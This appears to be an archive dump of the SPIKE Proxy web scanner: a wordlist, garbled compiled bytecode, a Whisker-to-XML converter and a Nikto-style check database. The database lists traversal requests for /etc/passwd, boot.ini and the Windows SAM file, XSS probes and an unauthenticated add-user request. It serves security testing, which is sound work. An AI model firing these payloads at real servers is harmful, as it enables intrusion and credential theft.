Backup warez pr0n porn Scripts IISHelp IISAdmin IISSamples MSADC _vti_bin PBServer PBSData Rpc Printers BizTalkServerDocs BizTalkServerRepository MessagingManager BizTalkTracking NR content images _private _vti_conf _vti_log _vti_pvt _vti_script _vti_txt Microsoft aspbackup maps sdk htmldocs html iis endofspecialwords spkproxy/daveutil.pyc0100664000076500007650000003723307667726367014006 0ustar davedave- >csdkZdkZdkZdkZdklZdklZlZdk l Z  dk Z dZ dZ =dZQdZ\dZ_d Zpd Z|eid d Z}eieeeieiZ~eied eeZd ZdZdZedZgdZ gdZ!dZ"dZ#d dZ$#dZ%+dZ&4dZ'AdZ(JdZ)XddZ*`dZ+}dZ,dZ-d Z.dS(!N(s HTMLParser(s DumbWritersAbstractFormatter(sStringIOcsed}t| }x8|||jo#|id}||7}q"W|SdS(Nsi(sdataslens mybreakpointslengthsmysocketsrecvsnewdata(smysockets mybreakpointslengthsdatasnewdata((s ./daveutil.pys readuntils cs|idd} |ddjo !d}n #d}%|id}&x'&d|jo'|id}q]W(x%(d|jo)|idqW*x*d|jot+|id}-|djo.|i|d/qn1|i||d3|i||dqW4di |d|}5|djo 6d}n7|ddjo8d|}n9|Sd S( s5 /cow/../../../bob/bob2.php -> /bob/bob2.php s\s/iiis.ss..N( surlsreplacesfs tailslashssplitsdotsremovesindexs firstdotdotsjoinsfin(surls tailslashsfs firstdotdotsfinsdot((s ./daveutil.pys urlnormalizes4    cs=BCtii|oDnEtii|oFtd|niItii|\}}J|otii| oKt |nM|oNti |ndS(sworks the way a good mkdir should :) - already exists, silently complete - regular file in the way, raise an exception - parent directory(ies) does not exist, make them as well sCa file with the same name as the desired dir, '%s', already exists.N( sosspathsisdirsnewdirsisfilesOSErrorssplitsheadstailsdmkdirsmkdir(snewdirsheadstail((s ./daveutil.pysdmkdir=s cs[QRd}S|}Tx4T||jo#U|}V|idd}qWX|SdS(Nss s (sinputoldsinputsinputnewsreplace(sinputsinputoldsinputnew((s ./daveutil.pys joinallspacesQs   cs\]tidddSdS(Nii(srandoms randrange(((s ./daveutil.pysgetrandomnumber\scs_`d}bxs|Db]h}d|djoRe|ddjp|ddjog|d}nhtii||}nqWj|dddjokd|}nn|SdS(Nsis/s\i(stempspathsspathsossjoin(spathsstempspath((s ./daveutil.pyspathjoin_s  % cspq|}rd}sg}txTt|djoCutii|\}}v|djow|g|}nq$Wx|SdS(Nstempvals(spathstempslastsretListsosssplit(spathsretListslaststemp((s ./daveutil.pys pathsplitps   ss#cs#ti|t}|SdS(N(sstrings translatesdatas trans_nontextscleaned(sdatascleaned((s ./daveutil.pys prettyprintscsNt|d}ti|}|i|ii}|SdS(Nsrb( sopensfilesinfilescPicklesloadsobjscloses clientheadersURLsurl(sfilesobjsurlsinfile((s ./daveutil.pysgetURLfromFiles  cs|id}|diddjo|d }nd}g}xq|D]f}||d7}|idd}|idd}|idd}|i|q_W|SdS( Ns/is.is _directory_ss///s//( surlssplitsdirListscountsstarts realDirListsdirsreplacesappend(surlsstartsdirLists realDirListsdir((s ./daveutil.pysgetDirsFromURLs   c s|tjoti}n|id|i|i}|i o5t |i djo|d|i 7}nnJt |i djo0|d7}|t |i d|i7}n|d|id7}dddd d d d d ddg }x'|D]}||i|7}qWxD|iiD]0}||jo||i|7}nqTW|idjp |idjo=|i o(|dtt |id7}nn|di|i7}|SdS(Ns is?s orderlists sHosts User-AgentsAcceptsAccept-LanguagesAccept-EncodingsAccept-Charsets Keep-Alives ConnectionsPragmas Cache-ControlsGETsContent-Length: s(smybodysNonesspkproxysbodysmyheadersverbsgetProxyHeadersURLsrequestsuseRawArgumentsslens allURLargss URLargsDictsjoinargss orderlistsversions needOrderedsavalues grabHeadersheaderValuesDictskeyssakeysmysizessurpressContentLengthsstrsdatasjoin(smyheadersmybodys needOrderedsavaluesrequestsakey((s ./daveutil.pysconstructRequests0!  # '  #,csd}d}g}x_|D]T}|i|| o|d7}nd}||d||7}q(Wxo|iD]^}||jo qn| o|d7}nd}||d||7}qW|SdS(Niss&is=(sfirstsresultsdonelists orderlistsakeysappendsargdictskeys(sargdicts orderlistsdonelistsresultsakeysfirst((s ./daveutil.pysjoinargss&          csh}|id}x|D]}|djoi|id}t|djo tSn3|i |ddi |d||d g} x!|D ]} |i|qW |SdS(N(salistsastringschsappend(sastringschsalist((s ./daveutil.pys splitstrings   cs+|d|d|d}|SdS(Ns:
    (snamesvaluesresult(snamesvaluesresult((s ./daveutil.pysprintFormEntryscsd}||d|d|d7}|d|d|d7}|d7}|djoX|d |d |d 7}|d 7}|d |d |d7}|d7}n!|SdS(Nss: : ss
    s5Entry Actions: INJECTIONSCANs s+PASSWORD(sresultsnameskeysvaluesfile(snameskeysvaluesfilesresult((s ./daveutil.pysprintFormEntryAndValues !  csX#$d}%||d|d7}&|o'|d7}n(|d7})|SdS(Nss:
    (sresultsnameschecked(snamescheckedsresult((s ./daveutil.pysprintFormCheckbox#s    cs4+,d}-|d|d|d7}.|SdS(Nss (sresultsnamesvalue(snamesvaluesresult((s ./daveutil.pysprintHiddenEntry+s cs45x|iD5]z}6|djo 7qn8|i| o 9dSn:x5||D:]&};|||j o <dSnqcWqW=dSdS(NsDateii(sdict1skeyssakeysdict2shas_keysbkey(sdict1sdict2sakeysbkey((s ./daveutil.pys headerdictcmp4s    csVAC|i}D|i}E|i}F|i}G||||SdS(N( s clientheadersgenhashsCHs clientbodysCBs serverheadersSHs serverbodysSB(s clientheaders clientbodys serverheaders serverbodysCHsSHsCBsSB((s ./daveutil.pysgenhashAs csJKd}M|djo NdSnPd}Qt|}Rx=R||jo,S|t||d7}T|d}qEWVt|SdS(Nisii(sisastringshashnumslenslsordsstr(sastringshashnumsisl((s ./daveutil.pys hashstringJs   s_csMXY|id|}Z|id|}[|id|}]|SdS(Ns:s/s\(sastringsreplacessepcharstemp(sastringssepcharstemp((s ./daveutil.pys strencodeXscs@`a|idjo!bdGHcdt|iGHne|id}hdg}ix'|Di]}j||i|7}q]Wlx^|ii Dl]J}n|ddgjo.o||jop||i|7}nnqWs|d7}t|d t|i d7}w|d7}x|di |i7}y|SdS( Nss.Serious error: response's first line is empty!sFull response: %ss sServersContent-LengthsContent-lengths>BUGBUG: You should never see this. Try hitting shift-reload. sContent-Length: (smyheaders firstlinesstrsdatasresponses needOrderedsavalues grabHeadersheaderValuesDictskeyssakeysmybodysmysizesjoin(smyheadersmybodys needOrderedsavaluesakeysresponse((s ./daveutil.pysconstructResponse`s$   "  cs}~g}g}d}|o dGHn|id}x|D]}|od|d GHnd} |t|  i| gjo qPn|i dd}|d jo4|i d d}|d jo qPnn|i d |d } | d jo qPn||| !}|i d } | d jo qPn|| }|od|GHnh}|id}x|D]} t| } |od| GHn| id} d}d}d}x!| D]} |od| GHn| td djo8| idd}|i d }|| }n| td djo8| idd}|i d }|| }nS| td djo8| idd}|i d }|| }nq+W|o d|d|d|GHn|djo |djo|||s***Form Url is sWnt|}x$|D]}|i|q{Wy?t t t t }|i||iWn|SnXx'|iD]}|i|qW|SdS(Ns The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ BODYMATCH """ defaultresponse=xmltabify(defaultresponse,4) #print "Default Response=\n%s"%defaultresponse defaulttestcriteria=""" 200 BODYMATCH 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests. 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 """ defaulttestcriteria=xmltabify(defaulttestcriteria,3) #print "Default Test Criteria:" #print defaulttestcriteria #this stuff happens. import os,sys def xmlescape(line): """ escapes a sequence with xml escape characters """ line=line.replace("&","&") line=line.replace("<","<") line=line.replace(">",">") return line #for when we get a string that gets passed directly to regex but #is not actually a regex string def regexEscape(instring): for ch in ["?","\\","*",".","{","}","(",")","$","^",":"]: instring=instring.replace(ch,"\\"+ch) return instring class whiskertovulnxml: def __init__(self): pass def usage(self): print """ Usage: ./whiskerdbtovulnxml.py infile outdirectory """ sys.exit(1) def run(self,infile,outdir): file=open(infile,"r") data=file.readlines() file.close() #read in our template file=open("FileTemplate.xml","r") templatedata=file.read() file.close() i=0 for line in data: if line[:2]!="c,": continue line=xmlescape(line) linesplit=line.split(",") #print "linesplit=%s"%str(linesplit) #if I see @CGIDIRS, then just make it ${path} directory=linesplit[2] if directory=="@CGIDIRS": directory="${path}" typeoftest="directorytest" else: typeoftest="sitetest" file=linesplit[3] #un quoteafy some things if len(file)>1 and file[0]=="\"" and file[-1]=="\"": file=file[1:-1] #if I see just a number, then we want a particular status code searchfor=regexEscape(linesplit[4]) #method we use sending the request method=linesplit[5] #description of bug description=linesplit[6] newdata=templatedata.replace("FILENAME",file) newdata=newdata.replace("PATH",directory) #if it is just a number if searchfor.count("\"")==0: newdata=newdata.replace("RESPONSE",defaultresponse) newdata=newdata.replace("TESTCRITERIA",defaulttestcriteria.replace("200",""+searchfor+"")) newdata=newdata.replace("BODYMATCH","") else: #we have a string to look for in the body #first remove quotes searchfor=searchfor[1:-1] newdata=newdata.replace("RESPONSE",defaultresponse) newdata=newdata.replace("TESTCRITERIA",defaulttestcriteria) newdata=newdata.replace("BODYMATCH",searchfor) newdata=newdata.replace("DESCRIPTION",description) #this little character causes problems. newdatya=newdata.replace("","") file=open(os.path.join(outdir,"%s-%d.xml"%(typeoftest,i)),"w") file.write(newdata) file.close() i=i+1 if __name__ == '__main__': app = whiskertovulnxml() if len(sys.argv) < 3: app.usage() app.run(sys.argv[1],sys.argv[2]) spkproxy/passchecklist0100664000076500007650000000060507555555652014221 0ustar davedaveisapi content install doc docs stuff temp tmp admin bak Admin backup Backup warez pr0n porn Scripts IISHelp IISAdmin IISSamples MSADC _vti_bin PBServer PBSData Rpc Printers BizTalkServerDocs BizTalkServerRepository MessagingManager BizTalkTracking NR content images _private _vti_conf _vti_log _vti_pvt _vti_script _vti_txt Microsoft aspbackup maps sdk htmldocs html iis endofspecialwords spkproxy/scan_database.db0100644000076500007650000064001407556023252014502 0ustar davedave#VERSION,1.113 #LASTMOD,08.21.2001 # http://www.cirt.net # Note: Quotes are only required if the field contains a "," ######################################################################## # Server categories: "servercat",category,token match-string ######################################################################## servercat,abyss,abyss servercat,alchemyeye,Alchemy Eye servercat,apache,apache servercat,apache,jakarta servercat,apache,tomcat servercat,cern,cern servercat,citrix,citrix servercat,compaq,CompaqHTTPServer servercat,dwhttpd,dwhttpd servercat,goaheadwebs,GoAhead-Webs servercat,icecast,icecast servercat,iis,iis servercat,iis,personal web servercat,iis,pws servercat,jrun,jrun servercat,lotus,domino servercat,lotus,lotus servercat,mipcd,mofet servercat,mycio,mycio servercat,mywebserver,mywebserver servercat,ncsa,ncsa servercat,netscape,iplanet servercat,netscape,netscape servercat,novell,netware servercat,novell,novell servercat,omnihttpd,OmniHTTPd servercat,oracle,oracle servercat,sambar,Sambar servercat,savant,Savant servercat,simpleserver,SimpleServer servercat,tivoli,ADSM_HTTP servercat,w4,w4 servercat,weblogic,weblogic servercat,webserver4d,Web_Server_4D servercat,website,website ######################################################################## # Checks: c,ws type,root,method,file,result,information,data to send ######################################################################## # ,"",GET # Cross Site Scripting (XSS). CA-2000-02." #some stuff Dave Aitel added c,,@CGIDIRS,backup/,200,GET,"Backup directory detected" c,,@CGIDIRS,back/,200,GET,"Back directory detected" c,,@CGIDIRS,bak/,200,GET,"Bak directory detected" c,,@CGIDIRS,_vti_bin/,200,GET,"Bak directory detected" c,,@CGIDIRS,RPC/,200,GET,"RPC directory detected" c,,@CGIDIRS,IISHelp/,200,GET,"IISHelp directory detected" c,,@CGIDIRS,IISAdmin/,200,GET,"IISAdmin directory detected" c,,@CGIDIRS,PBServer/,200,GET,"PBServer directory detected" c,,@CGIDIRS,printers/,200,GET,"Printers directory detected" c,,@CGIDIRS,iisstart.asp,200,GET,"iisstart.asp detected" c,,@CGIDIRS,localstart.asp,200,GET,"iisstart.asp detected" # c,abyss,/,////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////,"index of",GET,"Abyss 1.03 reveals directory listing when 256 /'s are requested." c,alchemyeye,@CGIDIRS,../../../../../../../../../../WINNT/system32/ipconfig.exe,"IP Configuration",GET,"Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands." c,alchemyeye,@CGIDIRS,NUL/../../../../../../../../../WINNT/system32/ipconfig.exe,"IP Configuration",GET,"Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands." c,alchemyeye,@CGIDIRS,PRN/../../../../../../../../../WINNT/system32/ipconfig.exe,"IP Configuration",GET,"Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands." c,apache,/,"?D=A","index of \/",GET,"Apache allows directory listings by requesting. Upgrade Apache or disable directory indexing." c,apache,/,"?M=A","index of \/",GET,"Apache allows directory listings by requesting. Upgrade Apache or disable directory indexing." c,apache,/,"?N=D","index of \/",GET,"Apache allows directory listings by requesting. Upgrade Apache or disable directory indexing." c,apache,/,"?S=A","index of \/",GET,"Apache allows directory listings by requesting. Upgrade Apache or disable directory indexing." c,apache,/,.DS_Store,"Bud1",GET,"Apache on Mac OSX will serve the .DS_Store file, which contains sensitive information. Configure Apache to ignore this file or upgrade to a newer version." c,apache,/,.FBCIndex,"Bud2",GET,"This file son OSX contains the source of the files in the directory. http://www.securiteam.com/securitynews/5LP0O005FS.html" c,apache,/,/,"not found for:",OPTIONS,"By sending an OPTIONS request for /, the physical path to PHP can be revealed." c,apache,/,666%0a%0a666.jsp,"",GET,"Apache Tomcat 4.1 / Linux is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,apache,/,admin.cgi,"Administration",GET,"InterScan VirusWall administration is accessible without authentication." c,apache,/,blah-whatever.jsp,"JSP file \"",GET,"The Apache Tomcat 3.1 server reveals the web root path when requesting a non-existent JSP file. CAN-2000-0759." c,apache,/,COM2.IMG%20src=\"Javascript:alert('Vulnerable')\",alert('Vulnerable'),GET,"Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking DOS device names. CA-2000-02." c,apache,/,docs/,200,GET,"May give list of installed software" c,apache,/,index.html.ca,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." c,apache,/,index.html.cz.iso8859-2,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." c,apache,/,index.html.de,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." c,apache,/,index.html.dk,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." c,apache,/,index.html.ee,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." c,apache,/,index.html.el,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." c,apache,/,index.html.en,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." c,apache,/,index.html.es,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." c,apache,/,index.html.et,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." c,apache,/,index.html.fr,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." c,apache,/,index.html.he.iso8859-8,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." c,apache,/,index.html.hr.iso8859-2,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." c,apache,/,index.html.it,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." c,apache,/,index.html.ja.iso2022-jp,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." c,apache,/,index.html.kr.iso2022-kr,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." c,apache,/,index.html.ltz.utf8,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." c,apache,/,index.html.lu.utf8,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." c,apache,/,index.html.nl,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." c,apache,/,index.html.nn,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." c,apache,/,index.html.no,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." c,apache,/,index.html.po.iso8859-2,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." c,apache,/,index.html.pt,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." c,apache,/,index.html.pt-br,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." c,apache,/,index.html.ru.cp-1251,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." c,apache,/,index.html.ru.cp866,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." c,apache,/,index.html.ru.iso-ru,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." c,apache,/,index.html.ru.koi8-r,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." c,apache,/,index.html.ru.utf8,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." c,apache,/,index.html.se,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." c,apache,/,index.html.tw,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." c,apache,/,index.html.tw.Big5,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." c,apache,/,index.html.var,200,GET,"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." c,apache,/,lpt9,"FileNotFoundException:",GET,"Apache Tomcat 4.0.3 reveals the web root when requesting a non-existent DOS device. Upgrade to version 4.1.3beta or higher." c,apache,/,server-info,200,GET,"This gives a lot of Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts." c,apache,/,server-status,200,GET,"This gives a lot of Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts." c,apache,/,stronghold-info,200,GET,"Redhat Stronghold from versions 2.3 up to 3.0 disclose sensitive information. This gives information on configuration. CAN-2001-0868." c,apache,/,stronghold-status,200,GET,"Redhat Stronghold from versions 2.3 up to 3.0 disclose sensitive information. CAN-2001-0868." c,apache,/,test,"test hierarchy",GET,"Apache Tomcat default file found. All default files should be removed." c,apache,/,test.php,"Current PHP version",GET,"PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information." c,apache,/cgi-bin/,main_menu.pl,"NetDetector Traffic Analysis",GET,"The NetDetector allows unauthenticated users to perform database queries." c,apache,/cgi-bin/,printenv,"DOCUMENT_ROOT",GET,"Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed." c,apache,/cgi-bin/,printenv,"Premature end of script headers: /",GET,"Apache 2.0 printenv default script does not have execute permissions but leaks file system paths." c,apache,/cgi-bin/,search,"=sourcedir",GET,"Apache Stronghold 3.0 may reveal the web root in the source of this CGI ('sourcedir' value)." c,apache,/cgi-bin/,test-cgi,"PATH_TRANSLATED",GET,"Apache 2.0 default script is executable and reveals system information. All default scripts should be removed." c,apache,/cgi-bin/,test-cgi,"Premature end of script headers: /",GET,"Apache 2.0 printenv default script does not have execute permissions but leaks file system paths." c,apache,/content/base/build/explorer/,"none.php?..:..:..:..:..:..:..:etc:passwd:","root:",GET,"SunPS iRunbook Version 2.5.2 allows files to be read remotely." c,apache,/content/base/build/explorer/,none.php?/etc/passwd,"root:",GET,"SunPS iRunbook Version 2.5.2 allows files to be read remotely." c,apache,/docs/sdb/en/html/,index.html,"Support Database",GET,"This may be a default SuSe Apache install. This is the support page." c,apache,/error/,"%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini","[windows]",GET,"Apache allows files to be retrieved outside of the web root. Apache should be upgraded to 2.0.40 or above. CAN-2002-0661." c,apache,/error/,"%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini","[fonts]",GET,"Apache allows files to be retrieved outside of the web root. Apache should be upgraded to 2.0.40 or above. CAN-2002-0661." c,apache,/error/,HTTP_NOT_FOUND.html.var,"Available variants",GET,"Apache reveals file system paths when invalid error documents are requested." c,apache,/examples,/,"Directory Listing",GET,"Directory indexing enabled, also default JSP examples." c,apache,/examples/jsp/,index.html,"JSP Samples",GET,"Apache Tomcat default JSP pages present." c,apache,/examples/jsp/,source.jsp??,"Directory Listing",GET,"Tomcat 3.23/3.24 allows directory listings by performing a malformed request to a default jsp. Default pages should be removed." c,apache,/examples/jsp/snp/,snoop.jsp,"Request Information",GET,"Displays information about page retrievals, including other users." c,apache,/examples/servlet/,TroubleShooter,"TroubleShooter Servlet Output",GET,"Tomcat default jsp page reveals system information and may be vulnerable to XSS." c,apache,/examples/servlets/,index.html,"Servlet Examples",GET,"Apache Tomcat default JSP pages present." c,apache,/icons,/,200,GET,"Directory indexing is enabled, it should only be enabled for specific directories (if required). If indexing is not used all, the /icons directory should be removed." c,apache,/interscan,/,"Administration",GET,"InterScan VirusWall administration is accessible without authentication." c,apache,/jservdocs,/,200,GET,"Default Apache JServ docs should be removed." c,apache,/manual/images,/,200,GET,"Apache 2.0 directory indexing is enabled, it should only be enabled for specific directories (if required). Apache's manual shouuld be removed and directory indexing disabled." c,apache,/NetDetector/,middle_help_intro.htm,"NIKSUN-HELP",GET,"The system appears to be a Niksun NetDetector (network monitoring). The help files should be available at /NetDetector/quick_help_index.html" c,apache,/php/,php.exe?c:\boot.ini,"boot loader",GET,"The Apache config allows php.exe to be called directly." c,apache,/pls/,admin,"ENVIRONMENT",GET,"Oracle Apache+WebDB gives a lot of system information via the pls/admin script" c,apache,/servlet/org.apache.catalina.ContainerServlet/,,"",GET,"Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02." c,apache,/servlet/org.apache.catalina.Context/,,"",GET,"Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02." c,apache,/servlet/org.apache.catalina.Globals/,,"",GET,"Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02." c,apache,/servlet/org.apache.catalina.servlets.WebdavStatus/,,"",GET,"Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02." c,apache,/servlets/,MsgPage?action=badlogin&msg=,"",GET,"The NetDetector install is vulnerable to Cross Site Scripting (XSS) in it's invalid login message. CA-2000-02." c,apache,/site/eg/,source.asp,200,GET,"This asp (installed with Apache::ASP) allows attackers to upload files to the server. Upgrade to 1.95 or higher. CAN-2000-0628." c,apache,/soap/servlet/,soaprouter,200,GET,"Oracle 9iAS SOAP components allow anonymous users to deploy applications by default." c,apache,/test/,realPath.jsp,"WEBROOT",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed." c,apache,/test/jsp/,buffer1.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed." c,apache,/test/jsp/,buffer2.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed." c,apache,/test/jsp/,buffer3.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed." c,apache,/test/jsp/,buffer4.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed." c,apache,/test/jsp/,extends1.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed." c,apache,/test/jsp/,extends2.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed." c,apache,/test/jsp/,Language.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed." c,apache,/test/jsp/,pageAutoFlush.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed." c,apache,/test/jsp/,pageDouble.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed." c,apache,/test/jsp/,pageExtends.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed." c,apache,/test/jsp/,pageImport2.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed." c,apache,/test/jsp/,pageInfo.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed." c,apache,/test/jsp/,pageInvalid.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed." c,apache,/test/jsp/,pageIsErrorPage.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed." c,apache,/test/jsp/,pageIsThreadSafe.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed." c,apache,/test/jsp/,pageSession.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed." c,apache,/test/jsp/declaration/,IntegerOverflow.jsp,"Internal Servlet",GET,"Apache Tomcat default file found which reveals the web root. The /test directory should be removed." c,apache,/tomcat-docs/,index.html,200,GET,"Default Apache Tomcat documentation found." c,apache,/~nobody/,etc/passwd,"root:",GET,"Apache is misconfigured to view files by accessing ~nobody/filename. Change UserDir from './' to something else in httpd.conf." c,apache,@CGIDIRS,.htaccess,200,GET,"Contains authorization information" c,apache,@CGIDIRS,test-cgi.bat,200,GET,"This is an Apache for Win default. If Apache is lower than 1.3.23, this can be exploited as in test-cgi.bat?|dir+c:+>..\htdocs\listing.txt, but may not allow data sent back to the browser." c,cern,/,.wwwacl,200,GET,"Contains authorization information" c,cern,/,.www_acl,200,GET,"Contains authorization information" c,cern,@CGIDIRS,.wwwacl,200,GET,"Contains authorization information" c,cern,@CGIDIRS,.www_acl,200,GET,"Contains authorization information" c,cern,@CGIDIRS,ls," neither '/",GET,"The CERN server lets attackers view the host's path. Should be upgraded to Apache, as CERN is not maintained." c,citrix,/,applist.asp,200,GET,"Citrix server may allow remote users to view applications installed without authenticating." c,citrix,/,boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/,"boot loader",GET,"Citrix CGI allows directory traversal." c,compaq,"http://","127.0.0.1:2301/ HTTP/1.0","Compaq WBEM Device",GET,"The Compaq WBEM interface can act as an HTTP proxy, which can allow firewall or web proxy bypass. http://www.compaq.com/products/servers/management/SSRT0758.html" c,compaq,/Survey/,Survey.Htm,"System Components",GET,"This Compaq device, without authentication, gives lots of system information." c,compaq,/WEBAGENT/,CQMGSERV/CF-SINFO.TPF,"General Information",GET,"This Compaq device, without authentication, gives lots of system information. Load all the pages at /WEBAGENT/FINDEX.TPL" c,dwhttpd,/ab2/,@AdminAddadmin?uid=foo&password=bar&re_password=bar,200,GET,"Sun Answerbook may allow users to be created without proper authentication first. Attempted to add user 'foo' with password 'bar'." c,dwhttpd,/ab2/,@AdminViewError,200,GET,"Sun Answerbook allows viewing of the error logs without authentication." c,generic,/%3cscript%3ealert(%22xss%22)%3c/script%3e/,index.html,"",GET,"Server allows Cross Site Scripting (XSS) in 404 error messages if the code is in a directory. This may be Falcon web server." c,generic,/,"%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini","[windows]",GET,"Attackers can read any file on the system. Upgrade to Analogx 1.07 or higher." c,generic,/,"..%252f..%252f..%252f..%252f..%252f../windows/repair/sam",200,GET,"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information." c,generic,/,"..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam",200,GET,"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information." c,generic,/,"..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._",200,GET,"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information." c,generic,/,"..%255c..%255c..%255c..%255c..%255c../windows/repair/sam",200,GET,"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information." c,generic,/,"..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam",200,GET,"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information." c,generic,/,"..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._",200,GET,"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information." c,generic,/,"..%2F..%2F..%2F..%2F..%2F../windows/repair/sam",200,GET,"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information." c,generic,/,"..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam",200,GET,"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information." c,generic,/,"..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._",200,GET,"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information." c,generic,/,"","",GET,"Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/,".jsp",".jsp",GET,"Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/,".shtml",".shtml",GET,"Server is vulnerable to Cross Site 